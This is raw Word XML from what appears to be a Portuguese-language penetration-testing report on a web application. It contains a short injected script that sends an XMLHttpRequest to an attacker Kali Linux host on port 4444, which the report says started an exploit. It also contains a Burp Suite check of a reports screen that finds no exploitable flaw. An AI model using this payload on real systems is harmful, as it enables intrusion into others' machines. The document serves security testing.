        <w:t xml:space="preserve"> a instrução “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E353C0" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00881DA5" w:rsidP="005F159D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4D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e inicia uma chamada Ajax  do</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546C53" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tipo GET para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00546C53" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do_kali_linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4847" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> na porta 444</w:t>
      </w:r>
      <w:r w:rsidR="00A06B72" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de forma assíncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010DD4B" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="005F159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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r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lt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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script</w:t>
      </w:r>
      <w:proofErr w:type="gram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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206597E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="005F159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r = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spell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); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4090C" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="005F159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open</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
      <w:proofErr w:type="spell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GET",’http</w:t>
      </w:r>
      <w:proofErr w:type="spell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://IP_do_</w:t>
      </w:r>
      <w:r w:rsidR="00546C53"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kali_linux</w:t>
      </w:r>
      <w:r w:rsidR="009A4847"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:44</w:t>
      </w:r>
      <w:r w:rsidR="00A06B72"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4</w:t>
      </w:r>
      <w:r w:rsidR="009A4847"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4</w:t>
      </w:r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’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FBD5C6" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="005F159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setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spell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“</w:t>
      </w:r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FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r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”,”*”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344BA2F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="005F159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r.</w:t>
      </w:r>
      <w:proofErr w:type="gram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send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA79230" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="005F159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</w:pPr>
      <w:r w:rsidRPr="004D4181"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4D4181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/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0119B" w14:textId="77777777" w:rsidR="00A80565" w:rsidRPr="004D4181" w:rsidRDefault="00A80565" w:rsidP="00AC10D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D03CCD" w14:textId="77777777" w:rsidR="000F06E4" w:rsidRPr="004D4181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4181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14:paraId="2FB967FB" w14:textId="77777777" w:rsidR="00790D68" w:rsidRPr="004D4181" w:rsidRDefault="00790D68" w:rsidP="00790D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>Espera-se que a máquina que hospeda o sistema não permita que a conexão seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6C40C" w14:textId="77777777" w:rsidR="00790D68" w:rsidRPr="004D4181" w:rsidRDefault="00790D6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2C0595" w14:textId="77777777" w:rsidR="00790D68" w:rsidRPr="004D4181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14:paraId="3BDEFD78" w14:textId="2F3E87C1" w:rsidR="00B04AF1" w:rsidRPr="004D4181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="00881DA5" w:rsidRPr="004D4181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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="004D4181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90D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conforme mostram as </w:t>
      </w:r>
      <w:r w:rsidR="00657669" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s 29 e 30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a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requisição foi </w:t>
      </w:r>
      <w:r w:rsidR="00C343E3" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bem-sucedida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e o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> conseguiu iniciar o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7"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790D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> na máquina que hospeda o sistema explorado</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="004D418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AEC459" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Através dess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 xml:space="preserve">, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backdoors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF8FC7" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45334BE3" wp14:editId="5BF328C4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>139065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040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BB277" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00790D68" w:rsidP="00A805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Figura 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A4BBB" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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8E8303C" w14:textId="77777777" w:rsidR="001B2A0B" w:rsidRPr="004D4181" w:rsidRDefault="001B2A0B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E8F2579" w14:textId="77777777" w:rsidR="00D3778D" w:rsidRPr="004D4181" w:rsidRDefault="00D3778D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49D44DB" w14:textId="77777777" w:rsidR="001B2A0B" w:rsidRPr="004D4181" w:rsidRDefault="001B2A0B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06784B6" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181" w:rsidRDefault="00E77F75" w:rsidP="00A805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                             </w:t>
      </w:r>
      <w:r w:rsidR="001124EF" w:rsidRPr="004D41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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A6FD739" wp14:editId="4FA06E63">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1053465</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-26670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="360045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86" y="21445"/>
                <wp:lineTo x="21486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B1D66" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181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8839F61" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181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C863775" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181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40A8102" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181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2040D28" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181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07992DF" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181" w:rsidRDefault="0048472B" w:rsidP="00A805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Figura 30 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit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inciado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com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53043899" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181" w:rsidRDefault="004847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FC1947" w14:textId="77777777" w:rsidR="0048472B" w:rsidRPr="004D4181" w:rsidRDefault="0048472B" w:rsidP="00A805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6299F9" w14:textId="6357FA21" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59" w:rsidP="008853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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3.7</w:t>
      </w:r>
      <w:r w:rsidR="0088539E"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.2 </w:t>
      </w:r>
      <w:r w:rsidR="004E03D0" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: M</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apeamento</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de vulnerabilidades – Tela Relatórios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B9D5DA" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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4DD15B" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="0033639F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Tarefa realizada dia 17</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E655CA2" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="005A089C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Duração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 15 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219FA51F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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48E49D1" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00AC10D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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B28933" w14:textId="77777777" w:rsidR="000C051E" w:rsidRPr="004D4181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Utilizar o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Isso será possível a partir da captura de informações de cookie contidas no cabeçalho HTTP da requisição executada no momento em que um relatório de dados é gerado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19466529" w14:textId="77777777" w:rsidR="000C051E" w:rsidRPr="004D4181" w:rsidRDefault="000C051E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CA3A47F" w14:textId="77777777" w:rsidR="000D038A" w:rsidRPr="004D4181" w:rsidRDefault="0088539E" w:rsidP="0088539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A </w:t>
      </w:r>
      <w:r w:rsidR="0043674F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>igura 31 mostra os r</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>esultados obtidos no momento de gerar um relatório d</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os dados cadastrados no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEA645D" w14:textId="77777777" w:rsidR="0088539E" w:rsidRPr="004D4181" w:rsidRDefault="0088539E" w:rsidP="0088539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71947E1" w14:textId="77777777" w:rsidR="00751591" w:rsidRPr="004D4181" w:rsidRDefault="00807E49" w:rsidP="0088539E">
      <w:pPr>
        <w:jc w:val="center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 wp14:anchorId="58B7AD25" wp14:editId="197A54D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>43815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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34(Editada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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="0088539E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7"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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE78BEF" w14:textId="77777777" w:rsidR="000C051E" w:rsidRPr="004D4181" w:rsidRDefault="000C051E" w:rsidP="00AC10DC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0F019C8" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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De acordo com o</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s dados capturados através do</w:t>
      </w:r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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a página não recebe nenhum parâmetro</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00874975" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">manipulável </w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para realizar a requisição no momento em que um relatório é gerado. P</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6619CBD8" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="0" w:firstLine="709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lastRenderedPageBreak/>
        <w:t>Quando se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados carregados para filtrar os dados que serão exibidos no relatório</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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14:paraId="06AE1489" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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5F5670EF" w14:textId="77777777" w:rsidR="000C051E" w:rsidRPr="004D4181" w:rsidRDefault="000C051E" w:rsidP="000C051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A </w:t>
      </w:r>
      <w:r w:rsidR="0043674F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>igura 32 mostra os resultados obtidos no momento da impressão de um relatório gerado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12375E43" w14:textId="77777777" w:rsidR="00E77F75" w:rsidRPr="004D4181" w:rsidRDefault="00C37DA7" w:rsidP="000C051E">
      <w:pPr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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05155AE8" wp14:editId="1F4D1C7F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>148590</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>178435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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488" y="21252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35(Editada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7F738" w14:textId="77777777" w:rsidR="00751591" w:rsidRPr="004D4181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>Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
